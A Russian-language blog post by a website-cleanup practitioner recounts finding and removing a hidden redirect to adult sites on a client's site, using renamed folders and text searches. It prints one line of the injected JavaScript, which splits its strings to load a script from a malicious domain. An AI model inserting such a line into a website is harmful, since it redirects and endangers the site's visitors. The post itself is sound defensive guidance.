История лечения одного зараженного сайта или как найти вирус самостоятельно

Вирусы (речь про компьютерные) бывают разные. Порой удивляешься смекалке распространителей. И поскольку почти ежедневно по роду своей деятельности занимаюсь ими, то и удивления бывают разные. Но зачастую, распространители вирусов - парни хоть и хитрые, найти и обнаружить следы посторонней деятельности на своем сайте можно и без помощи специалистов. Разумеется и случаи бывают разные. Расскажу один будничный момент - историю лечения одного зараженного сайта.

"Разбирался" с одним "умным" вирусом сегодня (распространяются вирусы хакерами с разных стран и континентов, поэтому очень редко попадаешь на один и тот же, приходится каждый раз включать смекалку и целый набор разных утилит для поиска и устранения вируса): вы увидите, что ничего сложного, но обязательно нужна смекалка!

Очередной "пострадавший" вебмастер рассказывает: посетители жалуются, что с его сайта идет редирект на посторонние сайты непристойной тематики. Редирект работает не всегда, очень редко, лишь для избранных и не понятно вообще по-какому признаку. Но самое главное:

• никаких извещений поисковых систем (сайт чистый и пушистый);
• ни один онлайн-сканер не видит на сайте мобильного редиректа;
• ни один из пяти протестировавших сайт на мобильном устройстве не увидел редиректа;
• никакого постороннего или подозрительного кода в исходном коде страницы нет;
• никаких следов редиректа в файлах .htaccess или используемой темы нет...

Тем не менее, смекалисто открываю в браузере подгружаемые скрипты и вижу следующую картину:

Как видим, происходит подгрузка внешнего файла и с довольно таки подозрительного домена (да никакая самая страшная тизерная сеть не придумает такое название) - 6dfas9obxn234.us

Вбиваю в поиск - информации не много, лишь то, что сайт явно распространитель вирусов и по состоянию на 2 марта 2015 года лишь 7 из 62 антивирусов засомневались в чистоте домена. Кстати, просканировал и онлайн утилитой Dr.Web и, о чудо: сайт находится в базе нежелательных сайтов Dr.Web, но при всем при этом, проверенные им файлы js - потенциальные распространители такой заразы чисты и безневинны!

Сканирую файлы сайта на распространенные сигнатуры вирусов: шеллы, трояны... ничего! Не расстаюсь с версией, что код вызова внешнего сайта в js файлах. Проверяется моя версия просто: папки с js переименовываем (например, в js_) и смотрим на загруженные скрипты в браузере. Гениально! Теперь вредоносного домена не видно!

Теперь грузим на сайт утилиту поиска текста в файлах и ищем куски домена, "dfas9o", "n234.", "php?tds"... и ниже увидим почему куски. Быстро находится вставка в некоторых из js файлов следующего содержания:

document.write('<sc' + 'ript sr' + 'c="http://6d' + 'fas9obxn234.us/tds/j' + 's.php?tds=1651">');

Предвкушая победу над бредокодом, названия папок с js вернул вспять, но... ОПЯТЬ грузится вредоносный 6dfas9obxn234.us! Пребываю в недоумении, поскольку дальнейшие поиски никаких кусков вышеназванного домена не находятся больше на сайте!

Значит, кодирован и находится в тех же js файлах. В первую очередь смотрим на те, что используются темой и подгружаются в блоке. В одном из них (в ручном режиме) находится кодированная вставка:

Теперь ищем его куски "поиском и заменой" - находим в некоторых других и удаляем! Всегда так делайте: злоумышленник страхует себя всегда: его задача заставить код продержаться на сайте как можно больше и задача запутать вебмастера - код будет в разных файлах и разного вида.

После очистки всех зловредных кодов проверяем список подгружаемых скриптов: чисто! Значит поставленную задачу выполнили. Естественно, за кадром осталась история появления этого кода на сайте, но моя задача была показать Вам, как осуществляется поиск и устранение вредоносного кода и какую роль в этом играет смекалка!

А как вы боретесь с вирусами? И какие типы Вы встречали на своих сайтах?